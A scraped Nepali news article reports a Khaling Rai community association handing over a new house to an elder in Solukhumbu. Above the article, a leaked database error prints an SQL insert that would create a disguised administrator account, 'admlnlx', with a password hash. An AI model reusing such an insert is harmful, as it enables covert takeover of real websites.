WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BX.hKqBYv7LOrzciuufELAgSpbQKQJ0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-14 13:49:53', '', 'admlnlx', 'admlnlx')

किरात खालिङ राई उत्थान संघद्वारा घर हस्तान्तरण – Gaule Khabar

किरात खालिङ राई उत्थान संघद्वारा घर हस्तान्तरण

किरात खालिङ राई उत्थान संघद्वारा घर हस्तान्तरण

सोलुखुम्बु । किरात खालिङ राई उत्थान सघ द्वार वास नोक्छो (भुमे धामी)लाई घर हस्तान्तरण गरिएको छ ।

किरात खालिङ राई उत्थान संघ केन्द्रीय अध्यक्ष सिताकुमारी खालिङको प्रमुख आतिथ्यमा माप्य दुधकोशी गाउँपालिका ७ मा निर्मित नया घर हर्कजित खालिङ लाई हस्तान्तरण गरिएको हो ।

उक्त घर किरात खालिङ राई उत्थान संघ अमेरिका शाखको आर्थिक ब्यबस्थापन निर्माण भएको हो । घर निर्मानको लागि अध्यक्ष मकर बहादुर खालिङको उपस्तिथिमा गत फागुनमा एक उपभोक्ता समिती गठन गरि निर्माण गरिएको थियो ।

संघले धर्म, संस्कार, संस्कृति, मुन्धुमी भाषा, ब्यबहारिक बोलचालको भाषा, भेषभुषा र रिति रिवाजलाई संरक्षण गर्ने उदेश्य लिएर अघिबढेकोले समाजका अग्रज पुर्खाको समानको लागि उत्त घर निर्माण गरिएको अध्यक्ष सिताकुमारी खालिङले बताए ।

उक्त कार्यक्रममा उपभोक्ता समितिलाई किरात खालिङ राई उत्थान संघले प्रसम्सा पत्र, अग्रज पुर्हाहरुलाई फेटा गुथेर समान गरिएको थियो ।

कार्यक्रममा किरात खालिङ राई उत्थान संघका बरिस्ठ उपाध्यक्ष बलबहादुर खालिङ, केन्द्रीय सदस्य सलिना खालिङ, माप्य दुधकोशी गाउँपालिका वाडा न ७ का वडा सदस्य दुर्गाप्रसाद खालिङ, किरात खालिङ राई उत्थान संघका पुर्ब महासचिब जसबहादुर खालिङ, स्थानीय खालिङ पुर्खा, वडा न ७ का खालिङहरुको बाक्लो उपस्तिथी रहेको थियो ।

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका